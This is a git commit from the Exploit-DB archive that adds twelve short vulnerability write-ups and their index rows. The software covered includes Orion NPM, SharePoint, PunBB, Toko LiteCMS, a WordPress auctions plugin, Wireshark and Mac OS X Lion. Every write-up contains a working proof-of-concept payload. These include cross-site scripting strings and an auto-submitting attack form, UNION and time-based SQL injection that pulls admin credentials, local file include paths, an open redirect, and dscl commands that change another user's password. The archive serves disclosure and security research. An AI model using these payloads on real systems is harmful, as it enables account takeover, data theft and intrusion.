Update: 2015-02-22

12 new exploits
This commit is contained in:
Offensive Security 2015-02-22 08:37:11 +00:00
parent 6bdf638d1b
commit 62f8955407
13 changed files with 213 additions and 0 deletions

View file

@ -32555,6 +32555,18 @@ id,file,description,date,author,platform,type,port
36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0
36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 'index.php' Local File Include Vulnerability",2011-09-15,KedAns-Dz,php,webapps,0
36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 'id' Parameter SQL Injection Vulnerability",2011-09-18,m3rciL3Ss,asp,webapps,0
36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 'matchword' Parameter Cross Site Scripting Vulnerability",2011-09-19,"kurdish hackers team",asp,webapps,0
36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49614/info
Orion Network Performance Monitor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Orion Network Performance Monitor 10.1.3 is affected; other versions may also be vulnerable.
http://www.example.com/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E

12
platforms/asp/webapps/36134.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/49620/info
Microsoft SharePoint is prone to multiple URI open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
The following products are affected;
Microsoft SharePoint 2007
Microsoft SharePoint 2010
http://www.example.com/Docs/Lists/Announcements/NewForm.aspx?Source=[xss]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49667/info
ASP Basit Haber Script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ASP Basit Haber Script 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/haber.asp?id=28+union+select+0,kullaniciadi,sifre,3,4,5+from+admin

19
platforms/asp/webapps/36139.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/49668/info
Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/v1/urundetay.asp?id=21%28%29
http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
http://www.example.com/v1/linkler.asp?id=2%28%29
http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49674/info
Aspgwy Access is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Aspgwy Access 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/forum/search_results.asp?search_word=&matchword=[XSS]

9
platforms/osx/local/36143.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49676/info
Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.
Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.
$ dscl localhost -read /Search/Users/bob
$ dscl localhost -passwd /Search/Users/<username>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49625/info
Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.
http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49650/info
StarDevelop LiveHelp is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
StarDevelop LiveHelp 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?language_file=[LFI]%00

36
platforms/php/webapps/36137.txt Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/49660/info
PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
GET
/login.php?action=out&amp;id=3&amp;csrf_token=4b072f27396cec5d79&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
GET
/misc.php?action=markforumread&amp;fid=1&amp;csrf_token=c173cabad786&quot;/&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST /delete.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_confirm=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;delete=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /edit.php?id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/
script&gt;
POST /login.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;request_pass=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oin
k)&lt;/script&gt;
POST /misc.php?email=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;redirect_url=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_subject=&gt;&quot;&#039;&gt;&lt;script&gt;alert(o
ink)&lt;/script&gt;&amp;req_message=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;submit=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST
/profile.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;id=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_old_password=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_new_password1=&gt;&quot;&#039;&gt;&lt;scri
pt&gt;alert(oink)&lt;/script&gt;&amp;req_new_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;update=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
POST /register.php?action=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;
form_sent=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;csrf_token=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_username=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;req_password1=&gt;&quot;&#039;&gt;&lt;script&gt;alert
(oink)&lt;/script&gt;&amp;req_password2=&gt;&quot;&#039;&gt;&lt;script&gt;alert(369448)&lt;/script&gt;&amp;req_email1=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;timezone=&gt;&quot;&#039;&gt;&lt;script&gt;alert(oink)&lt;/script&gt;&amp;register=&gt;&quot;&#039;&gt;
&lt;script&gt;alert(oink)&lt;/script&gt;

46
platforms/php/webapps/36140.txt Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/49673/info
Toko LiteCMS is prone to an HTTP-response-splitting vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
Toko LiteCMS 1.5.2 is vulnerable; other versions may also be affected.
Cross Site Scripting Vulnerabilities
<html>
<title>Toko Lite CMS 1.5.2 (EditNavBar.php) Multiple Parameters XSS POST Injection</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss(){document.forms["xss"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/tokolite1.5.2/editnavbar.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="currPath" value=&#039;"><script>alert(1)</script>&#039; />
<input type="hidden" name="path" value=&#039;"><script>alert(2)</script>&#039; />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!</h3></center></font></b></a><br /><br />
</body></html>
HTTP Response Splitting
====================================================================
/edit.php:
--------------------------------------------------------------------
3: $charSet = "iso-8859-1";
4: $dir = "ltr";
5:
6: if ( isset( $_POST[ "charSet" ] ) )
7: {
8: $charSet = $_POST[ "charSet" ];
9:
10: if ( $charSet == "windows-1255" )
11: {
12: $dir = "rtl";
13: }
14: }
15:
16: header( "Content-Type: text/html; charset=" . $charSet );

25
platforms/php/webapps/36142.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/49675/info
net4visions is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following products are affected:
net4visions iBrowser 1.4.1 Build 10182009
net4visions iManager 1.2.8 Build 02012008
net4visions iGallery 1.0.0
iBrowser Plugin
http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
http://www.example.com/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
iManager Plugin
http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/random.php?dir=<script>alert(&#039;zsl&#039;)</script>
http://www.example.com/jscripts/tiny_mce/plugins/imanager/scripts/phpThumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>
iGallery Plugin
http://www.example.com/jscripts/tiny_mce/plugins/iGallery/scripts/pthumb/demo/phpThumb.demo.random.php?dir=<script>alert(&#039;zsl&#039;)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49521/info
Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable.
http://www.exploit-db.com/sploits/36128.pcap